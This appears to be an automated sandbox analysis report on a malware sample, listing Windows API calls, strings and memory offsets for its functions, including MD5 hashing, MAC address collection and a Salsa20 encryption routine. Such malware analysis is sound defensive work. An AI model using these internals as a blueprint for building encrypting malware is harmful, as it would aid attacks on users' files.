                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2427264223-472376889
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1082 40ef50-40ef7a call 420c62 1085 40efdc-40efe2 1082->1085 1086 40ef7c 1082->1086 1087 40ef80-40ef85 call 420c62 1086->1087 1089 40ef8a-40efbd call 42b420 1087->1089 1092 40efc0-40efcf 1089->1092 1092->1092 1093 40efd1-40efda 1092->1093 1093->1085 1093->1087
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0040EF69
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _malloc.LIBCMT ref: 0040EF85
                                                                                                  • _memset.LIBCMT ref: 0040EF9B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$AllocateHeap_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3655941445-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1094 413a90-413ab0 1095 413ab2-413ab8 1094->1095 1096 413af8-413afd 1094->1096 1097 413b00-413b05 call 44f23e 1095->1097 1098 413aba-413ac2 call 423b4c 1095->1098 1102 413b0a-413b0f call 44f1bb 1097->1102 1101 413ac7-413ace 1098->1101 1101->1102 1103 413ad0-413ae0 1101->1103 1106 413ae2-413af1 1103->1106 1107 413af4-413af7 1103->1107 1106->1107 1107->1096
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A
                                                                                                    • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 657562460-3788999226
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1108 42fb64-42fb77 call 428520 1111 42fba5-42fbaa call 428565 1108->1111 1112 42fb79-42fb8c call 428af7 1108->1112 1117 42fb99-42fba0 call 42fbab 1112->1117 1118 42fb8e call 42fe47 1112->1118 1117->1111 1121 42fb93 1118->1121 1121->1117
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0042FB7B
                                                                                                    • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                    • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                    • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                  • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                    • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                    • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                    • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                    • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                    • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                    • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1282695788-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1122 427f3d-427f47 call 427e0e 1124 427f4c-427f50 1122->1124
                                                                                                  APIs
                                                                                                  • _doexit.LIBCMT ref: 00427F47
                                                                                                    • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                    • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                    • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2158581194-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1125 412900-41298f call 413a90 MultiByteToWideChar call 418400 1130 412991-412997 call 422587 1125->1130 1131 41299a-41299e 1125->1131 1130->1131 1133 4129a0-4129a8 call 422587 1131->1133 1134 4129ab-4129bd 1131->1134 1133->1134
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-00000400,-00000400), ref: 00412966
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 626452242-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                  • _memset.LIBCMT ref: 004110CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                  • _malloc.LIBCMT ref: 00411100
                                                                                                  • _memset.LIBCMT ref: 0041110B
                                                                                                  • _sprintf.LIBCMT ref: 0041112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00411915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                  • _memset.LIBCMT ref: 004119B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                    • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                    • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                  • _memmove.LIBCMT ref: 0040F9EA
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                  • _memmove.LIBCMT ref: 0040FADA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                  • _memset.LIBCMT ref: 0040E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                  • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                  • _memset.LIBCMT ref: 0040EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                  • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                    • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                    • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                    • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                    • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                    • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                  • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                  • DeleteDC.GDI32(?), ref: 00482450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0040E67F
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _malloc.LIBCMT ref: 0040E68B
                                                                                                  • _wprintf.LIBCMT ref: 0040E69E
                                                                                                  • _free.LIBCMT ref: 0040E6A4
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                  • _free.LIBCMT ref: 0040E6C5
                                                                                                  • _malloc.LIBCMT ref: 0040E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                  • _sprintf.LIBCMT ref: 0040E720
                                                                                                  • _wprintf.LIBCMT ref: 0040E732
                                                                                                  • _wprintf.LIBCMT ref: 0040E73C
                                                                                                  • _free.LIBCMT ref: 0040E745
                                                                                                  Strings
                                                                                                  • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                    • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                  • _memmove.LIBCMT ref: 00410427
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                  • _memmove.LIBCMT ref: 00410514
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
